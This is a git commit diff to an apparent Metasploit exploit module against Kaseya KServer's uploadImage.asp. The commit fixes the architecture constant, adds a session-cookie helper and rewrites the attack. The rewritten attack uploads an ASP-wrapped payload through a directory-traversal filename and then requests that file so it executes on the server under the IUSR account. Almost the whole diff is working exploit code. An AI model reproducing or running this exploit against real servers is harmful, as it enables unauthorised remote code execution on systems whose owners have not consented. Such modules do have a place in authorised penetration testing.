Fix the arch declaration in uploaded module.

2013-11-18 14:49:03 +13:00 · 2013-11-18 14:49:03 +13:00 · 60a245b0c3
parent 636fdfe2d2
commit 60a245b0c3
1 changed files with 41 additions and 21 deletions
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@ -24,7 +24,7 @@ Code executed in this manner runs under the IUSR account.
 			},
 			'Author'         =>
 				[
-					'Thomas Hibbert' # thomas.hibbert@security-assessment.com
+					'Thomas Hibbert' # cartel
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@ -35,7 +35,7 @@ Code executed in this manner runs under the IUSR account.
 					'BadChars' => "\x00",
 				},
 			'Platform'       => 'win',
-			'Arch'		     => ARCH_x86,
+			'Arch'		     => ARCH_X86,
 			'Targets'        =>
 				[
                                 [ 'Kaseya KServer / Windows', {} ],
@ -62,6 +62,21 @@ Code executed in this manner runs under the IUSR account.
 		return Exploit::CheckCode::Appears
 	end

+        def get_cookie
+          res = send_request_cgi({
+                                   'method' => 'GET',
+                                   'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
+                                 })
+
+          if res and res.headers['Set-Cookie']
+            cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
+          else
+            fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
+          end
+
+          cookie
+        end
+
 	def exploit
          peer = "#{rhost}:#{rport}"
          
@ -69,25 +84,30 @@ Code executed in this manner runs under the IUSR account.
          exe  = generate_payload_exe
          asp  = Msf::Util::EXE.to_exe_asp(exe)          

-		data = Rex::MIME::Message.new
-          data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"")
+          post_data = Rex::MIME::Message.new
+          post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")

-		res = send_request_raw({
-			'method' => 'POST',
-                                         'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'),
-                                         'data'   => data,
-			'headers'	=> {
-                                           'ctype' => 'multipart/form-data; boundary=#{data.bound}'
-			}
-		})
-		if not res or res.code != 200
-			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
-		end

-		print_status("#{peer} - Executing payload #{@payload_name}")
-		res = send_request_raw({
-			'uri'    => normalize_uri(@payload_name),
-			'method' => 'GET'
-		})
+          data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+          cookie = get_cookie
+          res = send_request_raw({
+                                   'method' => 'POST',
+                                   'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name),
+                                   'data'   => data,
+                                   'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+                                   'cookie' => cookie
+                                 })
+
+          if not res or res.code != 200
+            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+          end
+          
+          print_status("#{peer} - Executing payload #{@payload_name}")
+          res = send_request_cgi({
+                                   'uri'    => normalize_uri(@payload_name),
+                                   'method' => 'GET'
+                                 })
 	end
-end
+      end
+